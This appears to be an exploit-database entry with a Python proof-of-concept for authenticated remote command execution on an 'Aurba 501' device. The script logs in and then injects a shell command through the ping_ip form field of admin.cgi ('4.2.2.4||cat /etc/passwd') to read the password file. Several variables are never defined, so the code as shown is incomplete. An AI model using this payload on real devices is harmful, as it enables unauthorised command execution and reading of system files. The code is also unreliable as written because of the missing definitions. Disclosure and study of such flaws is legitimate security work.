Exploits / Vulnerability Discovered : 2024-08-24 |
Type : webapps |
Platform : linux
This exploit / vulnerability Aurba 501 authenticated rce is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux
import requests
from requests.auth import HTTPBasicAuth
# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)
# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
print("Login successful!")
# The command to be executed on the device
command = "cat /etc/passwd"
ping_ip = f"4.2.2.4||{command}"
# Data to be sent in the POST request
data = {
"ping_ip": ping_ip,
"ping_timeout": "1",
"textareai": "",
"ping_start": "Ping"
}
# Headers to be sent with the request
headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Referer": f"{base_url}/admin.cgi?action=ping",
"Connection": "close"
}
# Sending the HTTP POST request to exploit the vulnerability
exploit_url = f"{base_url}/admin.cgi?action=ping"
response = session.post(exploit_url, headers=headers, data=data, verify=False)
if any("root" in value for value in response.headers.values()):
print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
print(response.headers)
else:
print("Exploit failed. The response headers did not contain the expected output.")
else:
print("Login failed. Please check the credentials and try again.")
# Print the response headers for further analysis
print(response.headers)